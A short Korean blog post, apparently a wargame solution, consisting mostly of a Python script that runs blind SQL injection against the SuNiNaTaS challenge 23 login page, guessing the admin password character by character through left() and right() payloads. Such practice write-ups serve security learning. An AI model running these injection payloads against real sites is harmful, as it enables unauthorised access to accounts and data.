suninatas 23

Notice

Recent Posts

Recent Comments

Link

« 2025/05 »
일	월	화	수	목	금	토
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31

Tags more

Archives

Today

Total

관리 메뉴

oioi

suninatas 23 본문

카테고리 없음

suninatas 23

oio! 2018. 7. 13. 19:30

suninatas 23 문제

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import requests
 
session = requests.Session()
 
#pw len
#adm'+'in' and len(pw)=12--
#adm'+'in'and(left(pw,1))='a'--
 
#word
wordlist = "abcdefghijklmnopqrstuvwzyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+"
answer= "v"
for i in range(2,13):
    for j in range(len(wordlist)):
        #print "adm'+'in'and(left(pw,"+str(i)+"))='"+answer+wordlist[j]+"'--"
        headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (iPhone; CPU iPhone OS 11_0_1 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A402 Safari/604.1","Referer":"http://suninatas.com/Part_one/web22/web22.asp","Connection":"close","Accept-Language":"ko-KR"}
        cookies = {"ASPSESSIONIDSAADDQAR":"_Your Cookie_"}
        paramsGet = {"pw":"aaaaa","id":"'or(left(pw,"+str(i)+"))='"+answer+wordlist[j]+"'--"}
        response = session.get("http://suninatas.com/Part_one/web23/web23.asp", params=paramsGet, headers=headers, cookies=cookies)
        
        p = 'OK'
        
        if response.content.find(p) != -1:
            print wordlist[j]
            answer=answer+wordlist[j]
            
print("left: %s" % answer)
 
answer2=""
for i in range(1,4):
    for j in range(len(wordlist)):
        headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (iPhone; CPU iPhone OS 11_0_1 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A402 Safari/604.1","Referer":"http://suninatas.com/Part_one/web22/web22.asp","Connection":"close","Accept-Language":"ko-KR"}
        cookies = {"ASPSESSIONIDSAADDQAR":"_Your Cookie_"}
        paramsGet = {"pw":"aaaaa","id":"'or(right(pw,"+str(i)+"))='"+wordlist[j]+answer2+"'--"}
        response = session.get("http://suninatas.com/Part_one/web23/web23.asp", params=paramsGet, headers=headers, cookies=cookies)
        
        p = 'OK'
        
        if response.content.find(p) != -1:
            print wordlist[j]
            answer2=wordlist[j]+answer2
 
print("right: %s" % answer2)
 
print("left+right: %s" % answer+answer2)
Colored by Color Scripter
cs

공유하기 링크

페이스북
카카오스토리
트위터

Comments

oioi

suninatas 23 본문

suninatas 23

티스토리툴바